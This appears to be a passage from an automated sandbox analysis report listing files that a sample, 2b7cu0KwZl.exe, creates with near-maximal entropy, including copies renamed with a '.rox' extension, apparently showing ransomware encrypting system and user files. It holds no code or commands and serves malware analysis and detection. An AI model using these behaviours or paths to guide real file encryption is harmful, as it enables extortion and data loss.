Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\MSEdge entropy: 7.99509973664
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc entropy: 7.99569161612
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe entropy: 7.9954153521
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe entropy: 7.99430526978
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe entropy: 7.99517754125
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe entropy: 7.99410244104
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe entropy: 7.99373983415
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe entropy: 7.99547961522
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe entropy: 7.99550978151
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe entropy: 7.99453368476
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe entropy: 7.99500829729
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.9997140245
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99969166356
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe entropy: 7.99503742173
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe entropy: 7.99481237127
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe entropy: 7.99484163934
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc entropy: 7.99470729912
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe entropy: 7.9944782001
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc entropy: 7.99384963711
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe entropy: 7.99503207683
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99112777195
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe entropy: 7.99467351336
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc entropy: 7.99508649032
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99491223718
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99463345617
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7-zip_chm entropy: 7.99515118395
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe entropy: 7.99480999386
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99535959301
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe entropy: 7.99504301156
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9935856747
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9950928826
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99179545182
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99252562177
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe entropy: 7.99503438603
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe entropy: 7.99527433979
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe entropy: 7.99510873069
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe entropy: 7.99437109439
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Adobe_Acrobat DC_Acrobat_Acrobat_exe entropy: 7.9950534155
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99494061925
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99687282116
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe entropy: 7.99478144595
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99393937985
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe entropy: 7.99971298097
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\5091e1ba9bca4548a55e05605447918b_1 entropy: 7.99511096682
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\71dd91a867a24f4a8b8f55514985d2cc_1 entropy: 7.99454410272
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99926664607
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99397041016
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99772938556
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js entropy: 7.99785272493
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99705862036
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal entropy: 7.99984929044
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js entropy: 7.99532813021
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js entropy: 7.99871451912
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\70K_VXHc5sjoBPg97hL1pHJ7wo4.br[1].js entropy: 7.99953706637
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js entropy: 7.99886119232
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js entropy: 7.99859672177
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\F7QNLlcY2ODqtyZ0GIv9h7Cm5Yw.br[1].js entropy: 7.99931719268
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\dYw9trBOUuy7sL9xTZGIliMEagg[1].css entropy: 7.99936992218
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js entropy: 7.99898678992
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\EJz06avERkAqfuwcXY6H5w8dtNc[1].css entropy: 7.99952233383
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\H3gIahXaXkGgvztu9ouLmJNXhQM.br[1].js entropy: 7.99887976622
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Init[1].htm entropy: 7.99845696162
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Fz9exwO1sXH1v6MZmMHhkkwLSN4.br[1].js entropy: 7.99674184217
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\gYsYMd3hJLlkm0pWl7CInhg245Y.br[1].js entropy: 7.99672418308
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99558705817
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\k0oGmqG3Bk5KfPcZl898MPlQ1rI.br[1].js entropy: 7.99964478776
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js entropy: 7.99989878946
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe entropy: 7.99589014366
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe entropy: 7.99503499012
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples entropy: 7.99543807246
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras entropy: 7.99479461956
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url entropy: 7.99471350556
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe entropy: 7.99526880594
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe entropy: 7.99469542739
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm entropy: 7.99514176801Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm entropy: 7.99542456704Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99575141499Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99502715647Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe entropy: 7.99487475903Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe entropy: 7.99503807702Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe entropy: 7.99485440166Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre-1_8_bin_javacpl_exe entropy: 7.99536958349Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.index entropy: 7.99982443547Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\0.0.filtertrie.intermediate.txt entropy: 7.99383324575Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.99579343296Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99606444169Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\0.0.filtertrie.intermediate.txt entropy: 7.99467277153Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.ft entropy: 7.99592141592Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.index entropy: 7.99983697505Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.index entropy: 7.99984754753Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt entropy: 7.99950817717Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt entropy: 7.99987487724Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.ft entropy: 7.99636602789Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt entropy: 7.99964784989Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt entropy: 7.99926720825Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt entropy: 7.99906379928Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt entropy: 7.99820171196Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\Settings.ft entropy: 7.99909400771Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy) entropy: 7.9997140245Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.bmp.rox (copy) entropy: 7.99969166356Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\USOPrivate\UpdateStore\store.db.rox (copy) entropy: 7.99998577804Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99112777195Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9935856747Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99535959301Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99179545182Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9950928826Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99252562177Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99494061925Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99687282116Jump to dropped file
